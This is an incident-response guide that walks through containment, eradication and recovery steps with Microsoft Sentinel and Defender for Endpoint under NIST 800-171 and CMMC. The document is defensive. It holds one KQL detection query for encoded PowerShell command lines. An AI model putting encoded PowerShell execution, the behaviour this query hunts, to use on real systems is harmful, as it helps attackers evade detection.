Containment, Eradication & Recovery in Incident Response

6 minutes to read

Overview

The Containment, Eradication & Recovery phase is the third step in the Incident Response Process, as outlined by NIST 800-171 R2 and CMMC 2.0. This phase focuses on limiting the impact of an incident, removing the threat, and restoring systems to a secure operational state.

Objectives:

Contain the incident to prevent further damage.
Eradicate the root cause and any malicious artifacts.
Recover affected systems and resume normal operations.
Implement security measures to prevent recurrence.

Containment

Containment aims to limit the spread of an attack while maintaining system availability.

Containment, Eradication and Recovery Action Items

#	Containment, Eradication, and Recovery
1	Acquire, preserve, secure, and document evidence
2	Contain the incident
3	Eradicate the incident
3.1	Identify and mitigate all vulnerabilities that were exploited
3.2	Remove malware, inappropriate materials, and other components
3.3	If more affected hosts are discovered (e.g., new malware infections), repeat the Detection and Analysis steps (1.1, 1.2) to identify all other affected hosts, then contain (5) and eradicate (6) the incident for them
4	Recover from the incident
4.1	Return affected systems to an operationally ready state
4.2	Confirm that the affected systems are functioning normally
4.3	If necessary, implement additional monitoring to look for future related activity

Types of Containment:

Short-Term Containment (Immediate Actions)
- Work with OSC Compliance Managers to identify and isolate affected devices from the network.
- Disable compromised accounts.
Long-Term Containment (Sustained Actions)
- Apply patches and security updates.
- Implement enhanced monitoring.
- Restrict elevated access through Privileged Identity Management (PIM).

Technical Steps for Containment

Microsoft Sentinel Response Actions

Navigate to Microsoft Sentinel > Incidents.
Select the active incident and review related entities.

Microsoft Defender for Endpoint

Navigate to Microsoft 365 Defender > Incidents & Alerts.
Select the affected endpoint.
Execute the following actions:
- Isolate device from the network.
- Initiate live response session to investigate further.
- Restrict application execution to prevent malware propagation.

Manual Action Methods for Containing Common Incidents

Cyber Incident Scenario	Potential Containment Action(s)
Laptop infected with malware	Disconnect laptop from network
	Change the end users’ passwords on another machine
	Provide spare workstation to employee
	Remove malware from laptop
Virtual Machine infected with malware	Disconnect VM from network
	Save VM state as evidence
	Shutdown VM
	Stand up new VM from the last known good backup
Compromised account	Reset account password
	Force the account to log off from active sessions
	Reset password for recovery accounts
	Review account group memberships
	Review account privileges
	Monitor account activity
Denial of Service Attack	Block source IP address(es)
Phishing Attack	Block sender email and domain

Eradication

Once the incident is contained, the next step is to remove the threat completely.

Eradication Practices:

Remove malware, backdoors, and unauthorized accounts.
Conduct forensic analysis to determine attack vectors.
Validate system integrity and remove compromised credentials.

Technical Steps for Eradication

Using Microsoft Defender for Endpoint

Open Microsoft Defender for Endpoint.
Navigate to Threat Analytics > Active Threats.
Identify malicious processes and perform the following actions:
- Kill active malicious processes.
- Delete suspicious files.
- Revoke compromised session tokens.

Using Microsoft Sentinel for Log Correlation

Run Kusto Query Language (KQL) searches to identify malicious activity.

SecurityEvent
| where EventID == 4688
| where CommandLine contains "powershell -encoded"

Cross-check affected accounts and force password resets.
Review Entra ID Sign-in Logs for unusual authentication attempts.

Recovery

After eradication, recovery focuses on restoring affected systems and improving security posture.

Key Recovery Activities:

Wipe device back to factory settings, removing all data.
- Restore data to device from OneDrive.
- If files are impacted, restore previous valid versions of them.
Reinforce Security Controls
- Apply Multi-Factor Authentication (MFA).
- Reconfigure Conditional Access Policies.
Continuous Monitoring
- Enable Advanced Threat Protection.
- Implement Azure Security Center Recommendations.

Technical Steps for Recovery

Restoring Systems from Backup

Validate the backup snapshot integrity.
Restore clean VMs, files, and databases.
Apply Microsoft Defender Antivirus Scans before reconnecting systems.

Revalidating System Integrity

Run Microsoft Defender Threat Analytics.
Perform penetration testing to confirm no persistence mechanisms remain.
Log findings in Microsoft Sentinel for future reference.

Incident Categorization Framework

Severity Levels:

Severity	Containment	Eradication	Recovery
High	Immediate isolation, SOC notification	Full forensic investigation, root cause analysis	Rebuild systems, reinforce security
Medium	Network segmentation, user account lockdown	Malware removal, identity protection	System revalidation, MFA enforcement
Low	Log analysis, limited restrictions	Endpoint scanning, security policy updates	User education, review SIEM alerts

Conclusion

The Containment, Eradication & Recovery phase is crucial in limiting damage and restoring secure operations after an incident. Leveraging Microsoft Sentinel and Microsoft Defender, organizations can swiftly detect, contain, and remove threats while reinforcing cybersecurity defenses.

Next Steps:

Enhance automation in Microsoft Sentinel playbooks.
Strengthen Microsoft Defender for Endpoint threat intelligence.
Conduct periodic incident simulation exercises.

References

NIST 800-171 Rev 2: NIST Website
Microsoft Sentinel Documentation: Microsoft Docs
Microsoft Defender for Endpoint: Microsoft Docs